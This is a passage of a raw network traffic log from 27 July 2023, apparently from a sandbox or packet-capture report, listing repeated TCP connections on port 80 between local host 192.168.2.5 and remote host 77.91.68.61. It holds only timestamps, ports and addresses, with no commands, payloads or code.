Jul 27, 2023 01:35:51.173463106 CEST	80	50358	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.179229975 CEST	80	50358	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.179313898 CEST	50358	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.293574095 CEST	50358	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.294634104 CEST	50359	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.338926077 CEST	80	50358	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.339023113 CEST	50358	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.339935064 CEST	80	50359	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.340060949 CEST	50359	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.344248056 CEST	50359	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.389426947 CEST	80	50359	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.393647909 CEST	80	50359	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.393819094 CEST	50359	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.507101059 CEST	50359	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.507757902 CEST	50360	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.551809072 CEST	80	50360	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.551861048 CEST	80	50359	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.551918030 CEST	50360	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.551954985 CEST	50359	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.552421093 CEST	50360	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.599781990 CEST	80	50360	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.603899956 CEST	80	50360	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.604005098 CEST	50360	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.714764118 CEST	50360	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.715514898 CEST	50361	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.758914948 CEST	80	50360	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.759025097 CEST	50360	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.759701967 CEST	80	50361	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.759805918 CEST	50361	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.760153055 CEST	50361	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.804606915 CEST	80	50361	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.807578087 CEST	80	50361	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.807674885 CEST	50361	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.914037943 CEST	50361	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.917155981 CEST	50362	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.958971977 CEST	80	50361	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.959125042 CEST	50361	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.962605000 CEST	80	50362	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.962917089 CEST	50362	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.963279009 CEST	50362	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.007843018 CEST	80	50362	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.011533976 CEST	80	50362	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.011779070 CEST	50362	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.117649078 CEST	50362	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.118411064 CEST	50363	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.162153006 CEST	80	50362	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.162374020 CEST	50362	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.163373947 CEST	80	50363	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.165420055 CEST	50363	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.166541100 CEST	50363	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.211824894 CEST	80	50363	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.217084885 CEST	80	50363	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.217266083 CEST	50363	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.331741095 CEST	50363	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.332690954 CEST	50364	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.379740000 CEST	80	50363	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.379784107 CEST	80	50364	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.380059958 CEST	50363	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.380115032 CEST	50364	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.386046886 CEST	50364	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.430305958 CEST	80	50364	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.435285091 CEST	80	50364	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.437489033 CEST	50364	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.554171085 CEST	50364	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.555253983 CEST	50365	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.598311901 CEST	80	50364	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.598653078 CEST	50364	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.599912882 CEST	80	50365	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.600065947 CEST	50365	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.602616072 CEST	50365	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.646985054 CEST	80	50365	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.651246071 CEST	80	50365	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.652102947 CEST	50365	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.767364979 CEST	50365	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.768117905 CEST	50366	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.812443972 CEST	80	50366	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.812477112 CEST	80	50365	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.812555075 CEST	50365	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.812902927 CEST	50366	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.814784050 CEST	50366	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.859193087 CEST	80	50366	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.863929033 CEST	80	50366	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:52.864029884 CEST	50366	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.991734982 CEST	50366	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:52.992477894 CEST	50367	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.036006927 CEST	80	50366	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.036448002 CEST	80	50367	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.036536932 CEST	50366	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.036585093 CEST	50367	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.038717985 CEST	50367	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.082940102 CEST	80	50367	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.088589907 CEST	80	50367	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.090101004 CEST	50367	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.200704098 CEST	50367	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.201730967 CEST	50368	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.245091915 CEST	80	50367	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.245594978 CEST	80	50368	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.245726109 CEST	50367	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.245770931 CEST	50368	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.246309042 CEST	50368	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.290117025 CEST	80	50368	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.294157982 CEST	80	50368	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.296116114 CEST	50368	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.415524006 CEST	50368	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.416393042 CEST	50369	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.459676981 CEST	80	50368	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.460968971 CEST	80	50369	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.461126089 CEST	50368	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.461168051 CEST	50369	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.487391949 CEST	50369	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.531863928 CEST	80	50369	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.535289049 CEST	80	50369	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.537233114 CEST	50369	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.650769949 CEST	50369	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.651623011 CEST	50370	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.695337057 CEST	80	50369	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.695446968 CEST	80	50370	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.695574999 CEST	50369	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.695628881 CEST	50370	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.698868990 CEST	50370	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.742862940 CEST	80	50370	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.746115923 CEST	80	50370	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.746227980 CEST	50370	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.852828026 CEST	50370	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.855871916 CEST	50371	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.897217989 CEST	80	50370	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.897361040 CEST	50370	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.900336027 CEST	80	50371	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.900471926 CEST	50371	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.900831938 CEST	50371	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:53.945197105 CEST	80	50371	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.949822903 CEST	80	50371	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:53.950012922 CEST	50371	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.055967093 CEST	50371	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.056602955 CEST	50372	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.101447105 CEST	80	50371	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.101491928 CEST	80	50372	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.101612091 CEST	50371	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.101654053 CEST	50372	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.103751898 CEST	50372	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.148313999 CEST	80	50372	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.153014898 CEST	80	50372	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.153143883 CEST	50372	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.256287098 CEST	50372	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.256999969 CEST	50373	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.300426006 CEST	80	50372	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.300575972 CEST	50372	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.301738024 CEST	80	50373	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.301842928 CEST	50373	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.302241087 CEST	50373	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.347069979 CEST	80	50373	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.350991011 CEST	80	50373	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.351129055 CEST	50373	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.460408926 CEST	50373	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.461103916 CEST	50374	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.505237103 CEST	80	50373	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.505316973 CEST	50373	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.505563974 CEST	80	50374	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.505656958 CEST	50374	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.506222010 CEST	50374	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.550728083 CEST	80	50374	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.555320978 CEST	80	50374	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.555418015 CEST	50374	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.662950039 CEST	50374	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.663760900 CEST	50375	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.707535982 CEST	80	50374	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.707648993 CEST	50374	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.707681894 CEST	80	50375	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.707782984 CEST	50375	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.708250046 CEST	50375	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.752197981 CEST	80	50375	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.756453037 CEST	80	50375	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.756545067 CEST	50375	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.869112015 CEST	50375	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.872170925 CEST	50376	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.913208961 CEST	80	50375	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.913337946 CEST	50375	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.916328907 CEST	80	50376	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.916471004 CEST	50376	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.916838884 CEST	50376	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:54.960743904 CEST	80	50376	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.965233088 CEST	80	50376	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:54.965317965 CEST	50376	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.088088036 CEST	50376	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.088937998 CEST	50377	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.132466078 CEST	80	50376	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.132607937 CEST	50376	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.134200096 CEST	80	50377	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.134339094 CEST	50377	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.135662079 CEST	50377	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.181693077 CEST	80	50377	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.186259985 CEST	80	50377	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.186386108 CEST	50377	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.287844896 CEST	50377	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.288517952 CEST	50378	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.334043026 CEST	80	50377	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.334079027 CEST	80	50378	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.334121943 CEST	50377	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.334173918 CEST	50378	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.335721016 CEST	50378	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.381535053 CEST	80	50378	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.384943962 CEST	80	50378	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.385027885 CEST	50378	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.502213955 CEST	50378	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.503020048 CEST	50379	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.546746969 CEST	80	50378	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.546823025 CEST	50378	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.547671080 CEST	80	50379	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.547753096 CEST	50379	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.548407078 CEST	50379	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.596369028 CEST	80	50379	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.596407890 CEST	80	50379	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.596467018 CEST	50379	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.717753887 CEST	50379	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.741645098 CEST	50380	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.762485981 CEST	80	50379	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.762609005 CEST	50379	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.787005901 CEST	80	50380	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.787112951 CEST	50380	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.793870926 CEST	50380	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.839770079 CEST	80	50380	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.843898058 CEST	80	50380	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:55.847738028 CEST	50380	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.961201906 CEST	50380	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:55.962023020 CEST	50381	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.006027937 CEST	80	50380	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.006119967 CEST	50380	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.006742954 CEST	80	50381	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.007349014 CEST	50381	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.008119106 CEST	50381	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.052874088 CEST	80	50381	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.057746887 CEST	80	50381	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.058111906 CEST	50381	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.164802074 CEST	50381	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.165587902 CEST	50382	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.210947037 CEST	80	50382	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.211069107 CEST	80	50381	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.211241007 CEST	50381	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.213242054 CEST	50382	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.214946032 CEST	50382	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.260279894 CEST	80	50382	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.264240980 CEST	80	50382	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.264389038 CEST	50382	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.368618965 CEST	50382	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.369270086 CEST	50383	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.412938118 CEST	80	50382	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.413041115 CEST	50382	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.414454937 CEST	80	50383	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.414557934 CEST	50383	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.414962053 CEST	50383	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.459841013 CEST	80	50383	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.463638067 CEST	80	50383	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.463795900 CEST	50383	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.578442097 CEST	50383	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.579128027 CEST	50384	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.622813940 CEST	80	50383	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.622895956 CEST	50383	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.623469114 CEST	80	50384	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.623590946 CEST	50384	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.625257969 CEST	50384	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.669704914 CEST	80	50384	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.674534082 CEST	80	50384	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.674659014 CEST	50384	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.794989109 CEST	50384	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.797061920 CEST	50385	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.839792013 CEST	80	50384	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.840409994 CEST	50384	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.841350079 CEST	80	50385	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.841463089 CEST	50385	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.842015982 CEST	50385	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:56.886255980 CEST	80	50385	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.890307903 CEST	80	50385	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:56.890429020 CEST	50385	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.007466078 CEST	50385	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.008251905 CEST	50386	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.051932096 CEST	80	50385	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.052052021 CEST	50385	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.052639961 CEST	80	50386	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.052764893 CEST	50386	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.055885077 CEST	50386	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.100341082 CEST	80	50386	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.105125904 CEST	80	50386	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.106010914 CEST	50386	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.221735001 CEST	50386	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.222387075 CEST	50387	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.266329050 CEST	80	50386	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.266458988 CEST	50386	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.266999960 CEST	80	50387	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.267098904 CEST	50387	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.268064022 CEST	50387	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.313359022 CEST	80	50387	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.317331076 CEST	80	50387	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.319885969 CEST	50387	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.435381889 CEST	50387	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.436089039 CEST	50388	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.480381966 CEST	80	50387	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.480427027 CEST	80	50388	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.480504036 CEST	50387	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.480731964 CEST	50388	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.482563972 CEST	50388	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.527424097 CEST	80	50388	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.531613111 CEST	80	50388	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.532592058 CEST	50388	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.647414923 CEST	50388	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.651753902 CEST	50389	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.691782951 CEST	80	50388	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.691881895 CEST	50388	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.696630955 CEST	80	50389	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.697968960 CEST	50389	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.698340893 CEST	50389	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.743000984 CEST	80	50389	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.746860981 CEST	80	50389	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.746993065 CEST	50389	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.876334906 CEST	50389	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.877304077 CEST	50390	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.921366930 CEST	80	50389	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.921498060 CEST	50389	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.921550035 CEST	80	50390	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.921725988 CEST	50390	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.922132969 CEST	50390	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:57.966408014 CEST	80	50390	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.971457005 CEST	80	50390	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:57.972403049 CEST	50390	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:58.084546089 CEST	50390	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:58.085222960 CEST	50391	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:58.129026890 CEST	80	50390	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:58.129359007 CEST	50390	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:58.129709005 CEST	80	50391	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:58.130234957 CEST	50391	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:58.130645037 CEST	50391	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:58.174873114 CEST	80	50391	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:58.180991888 CEST	80	50391	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:58.181926966 CEST	50391	80	192.168.2.5	77.91.68.61
